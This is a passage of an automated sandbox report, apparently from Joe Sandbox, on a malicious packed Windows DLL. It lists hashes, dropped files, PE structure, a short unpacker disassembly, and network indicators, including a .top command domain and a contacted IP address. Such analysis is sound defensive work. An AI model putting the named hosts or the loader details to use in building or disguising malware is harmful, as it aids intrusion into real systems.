  • Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.42.73.29
  • Excluded domains from analysis (whitelisted): login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, watson.telemetry.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
12:35:13API Interceptor1x Sleep call for process: loaddll32.exe modified
12:35:19API Interceptor2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
208.100.26.242DeviceManager.exeGet hashmaliciousBrowse
  • aeiziaezieidiebg.in/t.php?new=1
winsvc.exeGet hashmaliciousBrowse
  • aeiziaezieidiebg.in/t.php?new=1
http://sandra.prichaonica.comGet hashmaliciousBrowse
  • sandra.prichaonica.com/
http://sandra.prichaonica.comGet hashmaliciousBrowse
  • sandra.prichaonica.com/
http://losmibracala.orgGet hashmaliciousBrowse
  • losmibracala.org/
JN4WJOSyX7.exeGet hashmaliciousBrowse
  • aeiziaezieidiebg.in/t.php?new=1

Domains

No context

ASNs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
STEADFASTUShttps://csenergieqcca-my.sharepoint.com/:o:/g/personal/sduranleau_cssenergie_gouv_qc_ca/Eq8TIekRb7BMv2K1MvuFCk8Bqm052E2rG1iBxIa1zS-WoQ?e=fj1Q97Get hashmaliciousBrowse
  • 170.10.160.40
http://www.yallatiri.com/Get hashmaliciousBrowse
  • 67.202.105.31
1W1tc7zCfD.elfGet hashmaliciousBrowse
  • 67.202.86.67
a9wzpiBQYe.exeGet hashmaliciousBrowse
  • 162.249.125.58
wxr5X61VIQ.exeGet hashmaliciousBrowse
  • 162.210.101.174
M5sGwiInRJ.exeGet hashmaliciousBrowse
  • 198.23.58.153
YIoVPs4lb9.elfGet hashmaliciousBrowse
  • 67.202.86.98
E-dekont.exeGet hashmaliciousBrowse
  • 162.210.103.226
file.exeGet hashmaliciousBrowse
  • 198.23.58.153
GH1RPIdmzR.exeGet hashmaliciousBrowse
  • 198.23.58.153
LNNOKS54yR.exeGet hashmaliciousBrowse
  • 198.23.58.153
file.exeGet hashmaliciousBrowse
  • 198.23.58.153
file.exeGet hashmaliciousBrowse
  • 198.23.58.153
file.exeGet hashmaliciousBrowse
  • 198.23.58.153
file.exeGet hashmaliciousBrowse
  • 198.23.58.153
s6LVjIVEzL.exeGet hashmaliciousBrowse
  • 198.23.58.153
KCqftBk8gk.exeGet hashmaliciousBrowse
  • 198.23.58.153
woXZU5MAZL.exeGet hashmaliciousBrowse
  • 198.23.58.153
SGzdSxGBvV.exeGet hashmaliciousBrowse
  • 198.23.58.153
file.exeGet hashmaliciousBrowse
  • 198.23.58.153

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Program Files\WinRAP\RarExt32.dll

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):346783
Entropy (8bit):7.996288147606643
Encrypted:true
SSDEEP:6144:nuPt5aWk+Y/3hINHl9bVKRI0cZ+rmSM2DTlMVfPshRkj7ITKWVE3Rr1BdFnIi3Dq:nq5ayQRIBPQpx4MKVfPcEMeW4r1r1q2Q
MD5:73C06C75BD9AA0A194B0DC73AB38CAC5
SHA1:7604D4BE31E6C017E3BD9A1E5590A81A7AAFB40F
SHA-256:FDE687287EF8CD7E6A6CE655355EACA2FBA25FD6C22CC1E4040281F73205BA90
SHA-512:C8ABAEA48ABC45FDB8C20EE1945494C42E0E3CD487723F48BD34F31FD31833A94DEB38796397C8359FB3123E028A99AB5E8E05438399DCC34AE65D522F78487A
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 95%
  • Antivirus: Virustotal, Detection: 93%, Browse
  • Antivirus: Metadefender, Detection: 80%, Browse
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... .L`N.L`N.L`N.7|B.M`N.o..N`N..|@.N`N.#.J.N`N..D.N`N.L`O."`N.o.._`N.zFE.z`N.L`N.M`N..E.O`N..J.M`N.RichL`N.................PE..L.....bX...........!.........P... ..N5.......0......................................................................f>..>....3.......0.......................>.......................................................................................nsp0.... ..........................`....nsp1....P...0...F..................`....nsp2...G...........................`...........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_9cdbf19a94ecdea39c14ee8fd4f9ea7f9e7533d_fe4ae974_14fd8b6a\Report.wer

Download File
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8400335209117962
Encrypted:false
SSDEEP:96:89rfFEagpyMy9hy1Dg/jSupXIQcQ8c6+RccEmcw3G+a+z+HbHg/cBRTf3ocFa9ic:8hD7HSq6MYjAD/u7sfS274Itb
MD5:029B56FA46932336D4C61BCBFC7C378F
SHA1:C669704DC882324B11DB6C3522B1E55A873DC56C
SHA-256:5E4A1C71BAE91320F892346A7B9FC2414CB7F3B027845718669602496755182B
SHA-512:496C8F34DDAECE907A9880EB3ECF94582261112687BFEE45C4880FE41D5B76F7982D703F07C4BEC5EC839FFC09BDD1561EAD706117AE7326FA922CD1FB685735
Malicious:false
Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.1.9.4.8.9.1.6.2.3.2.3.9.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.1.9.4.8.9.1.7.5.9.1.7.6.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.7.0.b.6.e.3.-.c.5.2.f.-.4.f.c.4.-.9.1.d.3.-.e.c.e.2.e.1.a.f.8.3.c.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.4.5.f.7.5.1.-.4.2.1.4.-.4.7.5.3.-.9.6.0.b.-.7.2.f.8.3.e.9.2.b.a.f.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.4.8.-.0.0.0.1.-.0.0.1.f.-.7.e.8.a.-.c.f.5.3.7.8.e.f.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_69aa54bf4562ff7e548e4d05abc368941456d4_82810a17_050990c9\Report.wer

Download File
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.9541844269298931
Encrypted:false
SSDEEP:192:5OoziG0oXQHrCiljed+v/u7sfS274It7c:AozigX4rCiljei/u7sfX4It7c
MD5:D4871BD5F09D001ED088F83000470E6C
SHA1:FFCAB51A20C499035AE146931589B1FD9E9FD4E1
SHA-256:31F9341886D4BC84A223453E44A5EA72581C1FE8553125FC413B9BB4918DEDD4
SHA-512:DBBA522DEE9296ADB9E1A475903AB3738D538D26A66E688AE006F8426F19987CFE39CA59278591DF1B9DD88B9FE7A08D9D09DBB49A211BD3478715E894800605
Malicious:false
Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.1.9.4.8.9.1.8.2.6.4.0.9.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.1.9.4.8.9.1.9.7.1.7.2.2.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.c.b.7.1.7.e.-.f.7.0.a.-.4.7.1.d.-.9.0.7.1.-.5.4.b.7.e.f.9.6.1.e.6.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.6.d.9.e.b.d.-.7.0.6.6.-.4.5.f.d.-.9.e.a.a.-.b.5.b.6.5.2.c.4.c.e.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.c.4.-.0.0.0.1.-.0.0.1.f.-.1.3.3.3.-.0.9.5.4.7.8.e.f.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER806D.tmp.dmp

Download File
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Thu Nov 3 11:35:16 2022, 0x1205a4 type
Category:dropped
Size (bytes):52196
Entropy (8bit):2.100276099272835
Encrypted:false
SSDEEP:384:M5/e3Pu10D2Mc31XAU7gB4PxVTnaRsjX9e:A/e3PQXAU7gBEVrH9e
MD5:EB05BCAEF80D6506CB224436AABDF23B
SHA1:B7C399B3652175ED0C13349064A4CF82B73C046E
SHA-256:BDB78C5C68739527F64F8F5E4D02722E7EA16A59BBD7D51F06ABF43325A2F24D
SHA-512:936320A6FF6E732E18C93E04C5B05D50F7B70B34AB4C9635D34736AC5C4C352CF0E136081159EBCCEC17F523274BF70E57AA8111F379CCFD281B09C6FEE9229C
Malicious:false
Preview:MDMP....... .......t.cc....................................<...........4....+..........`.......8...........T...........................................................................................................U...........B......`.......GenuineIntelW...........T.......H...l.cc.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER832D.tmp.WERInternalMetadata.xml

Download File
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8362
Entropy (8bit):3.6863479858171404
Encrypted:false
SSDEEP:192:Rrl7r3GLNigz6r7Xc6YeCSUD0gmf+RSyiQ+pDN89baIsfSem:RrlsNiU6r7Xc6Y7SUD0gmf+RSyVa7fi
MD5:DFAD9C1AB9D806D7B01DDAFAF8ACD34B
SHA1:59C0AD8ACF214B2EC64EDB2751E98CC159245C4F
SHA-256:D8CF1907D1E9B46F8EE1D90E6377FEFFF34A6C16582A972DCD1BFF26AAC5773E
SHA-512:FF618E82D4383B86F4B4890346DDC2A6560574049B129190433E860FBA7C2F18C6F2F9E50E035282AF48344E144C4A6E91F422AFF04B1290842E6A9112DB99DB
Malicious:false
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.4.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER83CA.tmp.xml

Download File
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4659
Entropy (8bit):4.417019346367334
Encrypted:false
SSDEEP:48:cvIwSD8zsEJgtWI9vvWgc8sqYjU8fm8M4JtNJF1x+q8vvNzKcQIcQwj4d:uITfCI+grsqY9JjKNKkwj4d
MD5:2458C14FABB503C2EC5BB679358ACBD3
SHA1:590750A58C4B7D08D8C7FE6982917D1BAB14D0AD
SHA-256:8FD99E797CDF7937C7E653E9AD6B551FABBE95EDF2CB2EF18F67EF9CD202844D
SHA-512:A83B9728E50562E8BF64A8FC9A85B9D56C0325C70AE47A7743B6182E11D29DB0FACBABC37225D107561232D97C972C599234E24221E2111D1D73AE1461811A9C
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1763805" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER885C.tmp.dmp

Download File
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 15 streams, Thu Nov 3 11:35:18 2022, 0x1205a4 type
Category:dropped
Size (bytes):54232
Entropy (8bit):2.031946433338903
Encrypted:false
SSDEEP:192:1S5RU7kxSJ1O5SkbJYh0aKyiM2PDdAQtnq/v8wYVuedFZCATN3cm:qxF5Lb002J2PDdAQQYVuy3Nsm
MD5:AA44E92E0176A2ACF98F8858692C0ABD
SHA1:E9BDE845E0E90E3192DFA6783BB156990C18928A
SHA-256:17232689A5E7C9B99F13C02CD1ED79D7AB4A9414B95E3EF370C1D5EDD10EBAEB
SHA-512:4DD89C5418B9D451B5B5A7C3F1CF7B12896271731D551D6623007BF1770E81F2165095971E5C4C07C0BDD50D2B831E6A1207D74FAA28463ABDA40F71DC864C74
Malicious:false
Preview:MDMP....... .......v.cc....................................$...........t....3..........`.......8...........T............!...............................................................................................U...........B..............GenuineIntelW...........T...........m.cc.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B4B.tmp.WERInternalMetadata.xml

Download File
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8346
Entropy (8bit):3.6859501652550146
Encrypted:false
SSDEEP:192:Rrl7r3GLNiGN60zl66YgD067b/Mgmf8kRSKQ+pDH89bd0sfYfm:RrlsNic696Yq067b/Mgmf8kRS/dnfN
MD5:80A5435F92AC764FD43A4D26D0F6A498
SHA1:5EE6E7A91C9586B919A870876DC2279EAD34A071
SHA-256:227B42D87F9C480DC3373FD2FA6DFF47CF3BC75DFFAB293D8B51A4CE7A778BB8
SHA-512:7DB8567B178598F64A7E32428578D55C7C9DA6F6A084A5468701F47D15D3B11597BAAD31DA5BAC9EE7D6F4FBA38DB2F5739E855C685EE7D856B07ED82B5DA378
Malicious:false
Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.6.4.<./.P.i.d.>.........

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C46.tmp.xml

Download File
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4731
Entropy (8bit):4.438037024201743
Encrypted:false
SSDEEP:48:cvIwSD8zsEJgtWI9vvWgc8sqYjU8fm8M4JCdsNJFuDo+q8vjsNLA4SrSKd:uITfCI+grsqYlJwoKkADWKd
MD5:C3E1CAEDBAABCB26F01B8D4816EAA26E
SHA1:CBB46BBC8F6DD48E9BE7836B93512ED62F541225
SHA-256:E7C3546CE9687DA3F667E49464BBACA4514BE6A1145C2C202B1D143B70E71CCD
SHA-512:C822A0B7AE5BE0256C50D4084036B6541CD09B271BA0E75E8CBD8F1B0F0F97C484B518A7B713582FB0B4B840C4540FAEFDE2568B8D342BD0CD044134ABD0119A
Malicious:false
Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1763805" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.996288147606643
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:5iiXyNVCQ3.dll
File size:346783
MD5:73c06c75bd9aa0a194b0dc73ab38cac5
SHA1:7604d4be31e6c017e3bd9a1e5590a81a7aafb40f
SHA256:fde687287ef8cd7e6a6ce655355eaca2fba25fd6c22cc1e4040281f73205ba90
SHA512:c8abaea48abc45fdb8c20ee1945494c42e0e3cd487723f48bd34f31fd31833a94deb38796397c8359fb3123e028a99ab5e8e05438399dcc34ae65d522f78487a
SSDEEP:6144:nuPt5aWk+Y/3hINHl9bVKRI0cZ+rmSM2DTlMVfPshRkj7ITKWVE3Rr1BdFnIi3Dq:nq5ayQRIBPQpx4MKVfPcEMeW4r1r1q2Q
TLSH:B174229DD43BBC04C24357F491121B930F57BD5CDAA2206572FE2DF6881AE205FB2EA6
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... .L`N.L`N.L`N.7|B.M`N..o..N`N..|@.N`N.#.J.N`N...D.N`N.L`O."`N..o.._`N.zFE.z`N.L`N.M`N...E.O`N...J.M`N.RichL`N................

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x1008354e
Entrypoint Section:.nsp1
Digitally signed:false
Imagebase:0x10000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp:0x5862801B [Tue Dec 27 14:52:11 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:99eb8dcfbd1a7e02dc8bf9d49c4aa67c

Entrypoint Preview

Instruction
pushfd
pushad
call 00007F9124999295h
pop ebp
mov eax, 00000007h
sub ebp, eax
lea esi, dword ptr [ebp-00000272h]
mov al, byte ptr [esi]
cmp al, 00h
je 00007F91249992A4h
mov esi, ebp
lea esi, dword ptr [ebp-0000024Ah]
mov al, byte ptr [esi]
cmp al, 01h
je 00007F91249994D8h
mov byte ptr [esi], 00000001h
mov edx, ebp
sub edx, dword ptr [ebp-000002B6h]
mov dword ptr [ebp-000002B6h], edx
add dword ptr [ebp-00000286h], edx
lea esi, dword ptr [ebp-00000242h]
add dword ptr [esi], edx
pushad
push 00000040h
push 00001000h
push 00001000h
push 00000000h
call dword ptr [ebp-0000020Eh]
test eax, eax
je 00007F9124999600h
mov dword ptr [ebp-0000028Eh], eax
call 00007F9124999295h
pop ebx
mov ecx, 00000368h
add ebx, ecx
push eax
push ebx
call 00007F9124999546h
popad
mov esi, dword ptr [esi]
mov edi, ebp
add edi, dword ptr [ebp-000002C6h]
mov ebx, edi
cmp dword ptr [edi], 00000000h
jne 00007F912499929Ch
add edi, 04h
mov ecx, 00000000h
jmp 00007F91249992A8h
mov ecx, 00000001h
add edi, dword ptr [ebx]
add ebx, 04h
cmp dword ptr [ebx], 00000000h
je 00007F91249992C8h
add dword ptr [ebx], edx
mov esi, dword ptr [ebx]
add edi, dword ptr [ebx+04h]
push edi
push ecx
push edx
push ebx
push dword ptr [ebp-0000020Ah]
push dword ptr [ebp-0000020Eh]
mov edx, esi

Rich Headers

Programming Language:
  • [ C ] VS98 (6.0) build 8168
  • [C++] VS98 (6.0) SP6 build 8804
  • [C++] VS98 (6.0) build 8168
  • [LNK] VS98 (6.0) imp/exp build 8168

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x83e660x3e.nsp1
IMAGE_DIRECTORY_ENTRY_IMPORT0x833800xa0.nsp1
IMAGE_DIRECTORY_ENTRY_RESOURCE0x830000x288.nsp1
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x83ea40x8.nsp1
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x00x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.nsp00x10000x820000x0False0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.nsp10x830000x550000x5469fFalse0.9981345387972548data7.998366920306635IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.nsp20xd80000x17470x0False0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

NameRVASizeTypeLanguageCountry
RT_VERSION0x830580x230dataChineseChina

Imports

DLLImport
KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
USER32.DLLDispatchMessageA
ADVAPI32.DLLRegCloseKey
WS2_32.DLLWSAStartup
SHLWAPI.DLLPathFileExistsA
MSVCRT.DLL??3@YAXPAX@Z
SHELL32.DLLSHGetSpecialFolderPathA

Exports

NameOrdinalAddress
unll10x10008e14

Possible Origin

Language of compilation systemCountry where language is spokenMap
ChineseChina

Network Behavior

Snort IDS Alerts

TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
192.168.2.48.8.8.856572532023883 11/03/22-12:35:13.698250UDP2023883ET DNS Query to a *.top domain - Likely Hostile5657253192.168.2.48.8.8.8

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Nov 3, 2022 12:35:14.111439943 CET496955658192.168.2.4208.100.26.242
Nov 3, 2022 12:35:14.234112024 CET565849695208.100.26.242192.168.2.4
Nov 3, 2022 12:35:14.234241962 CET496955658192.168.2.4208.100.26.242
Nov 3, 2022 12:35:14.356290102 CET565849695208.100.26.242192.168.2.4
Nov 3, 2022 12:35:14.356889009 CET496955658192.168.2.4208.100.26.242
Nov 3, 2022 12:35:14.448417902 CET496955658192.168.2.4208.100.26.242
Nov 3, 2022 12:35:14.570745945 CET565849695208.100.26.242192.168.2.4

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Nov 3, 2022 12:35:13.698250055 CET5657253192.168.2.48.8.8.8
Nov 3, 2022 12:35:14.096695900 CET53565728.8.8.8192.168.2.4

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
Nov 3, 2022 12:35:13.698250055 CET192.168.2.48.8.8.80xdf81Standard query (0)52eva.topA (IP address)IN (0x0001)false

